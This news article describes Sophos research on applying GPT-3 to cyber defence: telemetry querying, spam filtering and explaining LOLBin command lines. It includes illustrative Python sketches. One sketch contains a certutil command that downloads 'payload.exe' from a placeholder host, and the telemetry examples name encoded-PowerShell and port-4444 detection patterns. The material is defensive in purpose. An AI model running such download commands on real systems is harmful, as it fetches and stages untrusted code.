ChatGPT, the AI chatbot developed by OpenAI that gives human-like answers to users' questions, is many things to many people. From coders to students to academics, a wide cross-section of users is tapping its ability to pull relevant information out of the vast pool of data it was trained on.
Cybersecurity solutions company Sophos has said that ChatGPT can be used as a co-pilot by organisations to help them face and defeat cyber attackers. It has released a research report on how the cybersecurity industry can leverage GPT-3, the large language model behind the now well-known ChatGPT.
The report — GPT for You and Me: Applying AI Language Processing to Cyber Defenses — shows how GPT-3 was used to simplify the search for malicious activity in datasets and filter spam more accurately.
“We’ve long seen AI as an ally rather than an enemy for defenders, making it a cornerstone technology for Sophos, and GPT-3 is no different,” said Sean Gallagher, Principal Threat Researcher, Sophos. “The security community should be paying attention not just to the potential risks, but the potential opportunities GPT-3 brings.”
GPT-3’s cybersecurity potential
Experts at Sophos have been working on three prototype projects that demonstrate the potential of GPT-3 as an assistant to cybersecurity defenders. All three use a technique called ‘few-shot learning’, which primes the AI model with just a handful of labelled examples instead of requiring a large volume of pre-classified training data.
The first application was a natural language query interface for sifting through malicious activity in security software telemetry. Sophos tested the model against its endpoint detection and response product.
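The Sophos report does not include code, but a minimal sketch of the idea, assuming the openai Python package and a GPT-3-class completion model, might look like the following. The telemetry field names, query syntax and example questions are invented for illustration only and are not Sophos's prototype.

```python
# Illustrative sketch: a few-shot prompt that turns an analyst's natural-language
# question into a structured filter over (hypothetical) endpoint telemetry.
# Field names, filter syntax and the model name are assumptions, not Sophos's.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

FEW_SHOT_EXAMPLES = """\
Question: Show processes that spawned PowerShell with an encoded command.
Filter: process.child_name = "powershell.exe" AND process.cmdline CONTAINS "-enc"

Question: List outbound connections to port 4444 in the last day.
Filter: net.direction = "outbound" AND net.dst_port = 4444 AND event.age_hours <= 24
"""

def question_to_filter(question: str) -> str:
    """Translate a natural-language question into a telemetry filter string."""
    prompt = (
        "Translate the analyst's question into a telemetry filter.\n\n"
        f"{FEW_SHOT_EXAMPLES}\n"
        f"Question: {question}\nFilter:"
    )
    resp = client.completions.create(
        model="gpt-3.5-turbo-instruct",  # stand-in for a GPT-3-class completion model
        prompt=prompt,
        max_tokens=80,
        temperature=0,  # deterministic output for repeatable queries
    )
    return resp.choices[0].text.strip()

print(question_to_filter("Which hosts ran certutil to download a file this week?"))
```

Because the worked examples sit in the prompt rather than in a training run, supporting new kinds of questions is a matter of editing the examples, which is what makes the few-shot approach attractive for defenders without large labelled datasets.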
Sophos also tested a new spam filter built on GPT-3 and found that, when compared with other machine learning models for spam filtering, it was significantly more accurate.
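As an illustration only, a few-shot spam classifier along these lines could be sketched as below, with invented sample messages and a toy accuracy check standing in for the report's comparison against other machine learning models.

```python
# Illustrative sketch of few-shot spam filtering with a GPT-3-class model and a
# toy accuracy check. The sample messages, labels and model name are invented;
# Sophos has not published its prototype's prompts or data.
from openai import OpenAI

client = OpenAI()

FEW_SHOT = """\
Message: "Your parcel is held at customs, pay the release fee at this link."
Label: spam

Message: "Hi team, the quarterly report is attached for review before Friday."
Label: ham
"""

def classify(message: str) -> str:
    """Return 'spam' or 'ham' for a single message using few-shot prompting."""
    prompt = (
        "Label each message as spam or ham.\n\n"
        f"{FEW_SHOT}\n"
        f'Message: "{message}"\nLabel:'
    )
    resp = client.completions.create(
        model="gpt-3.5-turbo-instruct",  # placeholder for a GPT-3-class model
        prompt=prompt,
        max_tokens=3,
        temperature=0,
    )
    return resp.choices[0].text.strip().lower()

# Toy evaluation set (invented examples) to show how accuracy could be measured.
test_set = [
    ("Congratulations! You have won a gift card, click to claim.", "spam"),
    ("Can we move tomorrow's stand-up to 10am?", "ham"),
]
correct = sum(classify(msg) == label for msg, label in test_set)
print(f"accuracy: {correct / len(test_set):.0%}")
```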
Finally, Sophos researchers created a program to simplify the process of reverse-engineering the command lines of LOLBins (Living Off the Land Binaries), legitimate executable files that are already present in the user environment. Although benign in themselves, LOLBins can be abused by attackers to carry out malicious activity.
Reverse-engineering is notoriously tricky, but also critical for understanding LOLBins’ behaviour and stopping those types of attacks in the future.
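As a purely hypothetical sketch of such an assistant, one could hand a suspicious command line to a GPT-3-class model and ask for a plain-English breakdown. The prompt wording and the certutil example below are assumptions for illustration, not Sophos's prototype.

```python
# Illustrative sketch: asking a GPT-3-class model to explain what a suspicious
# LOLBin command line does. The command line is a well-known certutil download
# pattern; the model name and prompt wording are assumptions.
from openai import OpenAI

client = OpenAI()

def explain_command_line(cmdline: str) -> str:
    """Ask the model for a step-by-step explanation of a Windows command line."""
    prompt = (
        "You are assisting a malware analyst. Explain, step by step, what the "
        "following Windows command line does and whether it could be abused:\n\n"
        f"{cmdline}\n\nExplanation:"
    )
    resp = client.completions.create(
        model="gpt-3.5-turbo-instruct",  # placeholder for a GPT-3-class model
        prompt=prompt,
        max_tokens=200,
        temperature=0,
    )
    return resp.choices[0].text.strip()

print(explain_command_line(
    'certutil.exe -urlcache -split -f http://example.com/payload.exe C:\\Temp\\payload.exe'
))
```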